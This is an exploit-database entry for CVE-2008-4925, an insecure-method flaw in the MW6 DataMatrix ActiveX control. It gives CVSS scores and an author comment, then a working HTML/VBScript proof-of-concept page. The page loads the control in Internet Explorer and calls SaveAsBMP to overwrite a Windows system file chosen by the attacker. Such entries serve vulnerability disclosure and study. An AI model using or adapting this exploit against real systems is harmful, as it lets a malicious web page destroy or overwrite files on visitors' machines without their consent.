MW6 DataMatrix ActiveX (DataMatrix.dll) Insecure Method Exploit

2008.11.07
Credit: Dr.Pantagon
Risk: High
Local: No
Remote: Yes
CVE: CVE-2008-4925
CWE: NVD-CWE-Other


CVSS Base Score: 9/10
Impact Subscore: 10/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

&#239;&#187;&#191;<!-- By Dr.Pantagon DeltaSecurityCenter www.DeltaSecurity.ir Description : DataMatrix ActiveX ver : 3.0.0.1 CopyRight : MW6 Technologies, Inc. Download Link : http://www.mw6tech.com/datamatrix/try/MW6DataMatrix.zip This was written for educational purpose. Use it at your own risk. Author will be not responsible for any damage. Tested on Windows XP Professional SP2 all patched, with Internet Explorer 6 This control contains two methods SaveAsBMP(); And SaveAsWMF(); Sub SaveAsWMF ( ByVal FileName As String ) AND Sub SaveAsWMF ( ByVal FileName As String ) you can see this problem to all product this company --> <html> Test Exploit page <object classid='clsid:DE7DA0B5-7D7B-4CEA-8739-65CF600D511E' id='target' ></object> <script language='vbscript'> targetFile = "C:\WINDOWS\system32\DataMatrix.dll" prototype = "Sub SaveAsBMP ( ByVal FileName As String )" memberName = "SaveAsBMP" progid = "DATAMATRIXLib.MW6DataMatrix" argCount = 1 arg1="c:\windows\system_.ini" target.SaveAsBMP arg1 'target.SaveAsWMF arg1 </script>


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top